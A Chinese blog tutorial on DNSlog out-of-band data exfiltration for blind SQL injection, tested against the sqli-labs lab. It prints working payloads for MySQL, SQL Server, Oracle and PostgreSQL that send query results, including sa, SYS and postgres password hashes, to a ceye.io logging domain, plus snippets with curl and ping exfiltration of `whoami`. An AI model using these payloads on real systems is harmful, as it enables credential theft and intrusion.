dnslog mysql注入_DNSlog实现无回显注入

最新推荐文章于 2024-06-19 15:00:58 发布
最新推荐文章于 2024-06-19 15:00:58 发布
阅读量406 收藏
点赞数 1
文章标签: dnslog mysql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30877741/article/details/113556938
版权

背景

在某些不能直接通过漏洞获得回显信息的情况下,我们可以利用DNSlog来进行突破,在发起DNS请求的时候,会把我们想要得到的数据一同外带出来。

在SQL盲注中,最常用的就是二分法了,这种方法不仅麻烦,而且经常的发送请求,还容易被waf探测到,这时利用DNS解析时产生的日志来查看我们想要的数据就方便得多了。

可使用场景:SQL注入中的盲注

XSS绕过CSP

无回显的命令执行

无回显的SSRF

原理

基本原理从下图可以看明白,我们自己搭建DNS服务器,将需要查看的数据放到我们搭建的二级或者三级域名上去,通过DNS的解析日志就可以查看到数据。

1576937709.png

DNSlog平台

我们可以直接使用在线平台:http://ceye.io

如果自己有服务器和域名的可以使用BugScan的开源项目:https://github.com/bugscanteam/dnslog/

我们用到的就是红框中的域名

1577000150.png

利用场景1:SQL盲注

环境:phpstudy自带的mysql、sqli-lab

前提:具有load_file权限,secure_file_priv不为null

payload:select load_file(concat('\\\\',(select user()),'.xxx.ceye.io\\abc'))

以sqli-lab的less-9为例:

执行payload:http://192.168.255.134/sql/Less-9/?id=1' and if((select load_file(concat('\\\\',(select user()),'.xxx.ceye.io\\abc'))),1,1)--+这里concat()函数将查询的结果与三级域名拼接到一起,load_file()用于向\\查询结果.xxx.ceye.io\abc发起请求

在CEYE平台的Records-->DNS Query下可看到数据:

1577013562.png

[scode type="red"]注意:load_file()在linux下不能用来做DNSlog查询数据。因为这里利用的是windows下的UNC路径,而Linux没有UNC路径这个东西。

[/scode]以下摘自百度百科:

UNC(Universal Naming Convention):通用命名规则,也称通用命名规范、通用命名约定。

UNC为网络(主要指局域网)上资源的完整Windows 2000名称。

1:什么是UNC路径?UNC路径就是类似\softer这样的形式的网络路径。

2:UNC为网络(主要指局域网)上资源的完整Windows 2000名称。

格式:\servernamesharename,其中servername是服务器名。sharename是共享资源的名称。

其他数据库payload

a. MySqlselect load_file(concat('\\\\',(select user()),'.xxx.ceye.io\\abc';

b. SQL ServerDECLARE @host varchar(1024);

SELECT @host=(SELECT TOP 1

master.dbo.fn_varbintohexstr(password_hash)

FROM sys.sql_logins WHERE name='sa')

+'.ip.port.b182oj.ceye.io';

EXEC('master..xp_dirtree

"\\'+@host+'\foobar$"');

c. OracleSELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');

SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;

SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;

SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;

SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;

d. PostgreSQLDROP TABLE IF EXISTS table_output;

CREATE TABLE table_output(content text);

CREATE OR REPLACE FUNCTION temp_function()

RETURNS VOID AS $

DECLARE exec_cmd TEXT;

DECLARE query_result TEXT;

BEGIN

SELECT INTO query_result (SELECT passwd

FROM pg_shadow WHERE usename='postgres');

exec_cmd := E'COPY table_output(content)

FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';

EXECUTE exec_cmd;

END;

$ LANGUAGE plpgsql SECURITY DEFINER;

SELECT temp_function();

利用场景2:XSS绕过CSP

[scode type="yellow"]什么是CSP?[/scode]

CSP是内容安全策略(Content Security Policy)的缩写,它的实质就是一种白名单策略,在请求中添加Content-Security-Policy头来告诉浏览器哪些是能加载的,哪些是不能加载的(它的实现和执行全部由浏览器完成)

更多知识可查看:案例!使用CSP防止XSS 攻击入门、内容安全策略(CSP),防御 XSS 攻击的好助手

彼得威
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql dnslog_dnslog小技巧
weixin_28738165的博客
01-27 782
一、dnslog利用场景主要针对无回显的情况。Sql-BlindRCESSRFRFI(Remote File Inclusion)二、原理将dnslog平台中的特有字段payload带入目标发起dns请求,通过dns解析将请求后的关键信息组合成新的三级域名带出,在ns服务器的dns日志中显示出来。三、案例展示1.sql盲注普通的注入输入 1' and '1'='1,查询成功,1' and '1'=...
mysql dnslog_mysql-dnslog注入
weixin_39836751的博客
01-19 229
@Adminxednslog原理简介:简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设备的防护,Dnslog盲注可以减少发送的请求,直接回显数据实现注入mysql下的...
分享一个dnslog在线平台
最新发布
2301_76297780的博客
06-19 302
分享一个dnslog在线平台
mysql dnslog_DNSLOG用法
weixin_33018713的博客
01-27 231
0x00 Command Executioni. *nix:curl http://ip.port.b182oj.ceye.io/`whoami`ping `whoami`.ip.port.b182oj.ceye.ioii. windowsping %USERNAME%.b182oj.ceye.io0x01 SQL Injectioni. SQL ServerDECLARE @host varch...
mysql注入回显_利用DNSLog实现回显注入
weixin_31766003的博客
01-28 1769
测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入DNSLOG的原理DNS的解析是递归与迭代相结合的,下面给出了当我们访问其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DN...
dns mysql_DNSlog实现Mysql注入
weixin_32126033的博客
01-18 133
step1:通过DNSlog盲注需要用到load_file()函数。show variables like '%secure%' 查看load_file()可以读取的磁盘。1、当secure_file_priv为空,就可以读取磁盘的目录。2、当secure_file_priv为G:\,就可以读取G盘的文件。3、当secure_file_priv为null,load_file就不能加载文件。在5.7...
回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header...
PHP、mysql(手工注入
10-12
- **错误回显注入**:利用系统返回的错误信息,推断出数据库结构和数据。 - **堆叠查询**:在同一个SQL语句中执行多个查询,达到攻击目的。 3. **防止PHP手工注入的策略** - **参数化查询**:使用预编译语句...
cmd_火山PC_cmd_CMD回显_
10-01
标题中的"cmd_火山PC_cmd_CMD回显_"表明我们讨论的主题是关于在Windows操作系统中,使用命令行工具CMD(Command Prompt)与火山PC软件相结合,进行注册表的回显操作。火山PC是一款针对64位系统的软件,版本为...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
pipe-CMD.rar_CMD回显_CreateProcess_c++ cmd pipe_windows管道cmd_管道 c
07-15
利用管道执行cmd,显示回显内容,管道加createprocess实现该功能
DNSlog回显注入及其原理
sweelg的博客
07-18 564
原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。 具体使用详情参考: https://blog.csdn.net/qq_35569814/article/details/100348097 https://www.cnblogs.com/a.
SQL注入回显,利用DNSlog构造方式
m0_62207482的博客
03-17 409
防火墙的存在,容易被封禁 IP,可以尝试调整请求频率,有条件的使用代理池进行请求。
dnslogmysql在linux_DNSLogMySQL注入中的实战
weixin_32540913的博客
03-03 252
关于DNSlog在Web攻击的利用简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候可以通过DNSlog这种方式把想获得的数据外带出来。常用在哪些情况下SQL注入中的盲注无回显的命令执行无回显的SSRFDNSlog攻击的基本原理作为攻击者,提交注入语句,让数据库把需要查询的值和域名拼接起来,然后发生DNS查询,我们只要能获得DNS日志,就得到了想要的值。所以我...
【渗透测试】DNSLog注入
ssrf
10-25 3757
目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、p
SQL注入DnsLog注入
qq_52310755的博客
03-22 1971
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
翻译文章 | Just gopher it!无回显SSRF升级为RCE
weixin_40418457的博客
06-01 560
前言: 发现此漏洞的bug bounty团队不允许公开披露,因此我不会直接命名所涉及的程序。 我能说的是,这是在Hackerone运行时间最长、规模最大的bug赏金活动中发现的。多个Hackerone的现场黑客活动已经包括这个活动。 毋庸置疑,这是一家拥有世界级安全团队的公司,多年来一直有大量专门针对它的黑客专家——这使得这个漏洞的存在更加令人惊讶。 第1部分:侦察 通常对于一个大范围的bug赏金程序,我会从子域枚举开始,以增加我的攻击面,但在这种情况下,我只针对我的目标上的一个web应用程序。 因为我只专
mysql dnslog_Dnslog在SQL注入中的实战
weixin_30336949的博客
01-19 208
本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于Dnslog在SQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了这个攻击方式,或者只是用某个简单的payload做了简单的验证。然而在实际的运用中,因为环境的差异,利用也不同。本文详细的记录了在多种常见数据库实际运用过程的一些细节,包括POC的编写和原理,和一些网上没有公开的利用POC。0x01、关于DNSlog...
sql 注入 Dnslog
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-12 332
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
sql注入如何判断回显
04-26
判断SQL注入回显位的方法主要有以下几种: 1. 错误消息:当注入的SQL语句存在错误时,数据库可能会返回相应的错误消息。攻击者可以通过观察错误消息来判断是否存在注入漏洞。 2. 布尔盲注:攻击者可以通过构造特定...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值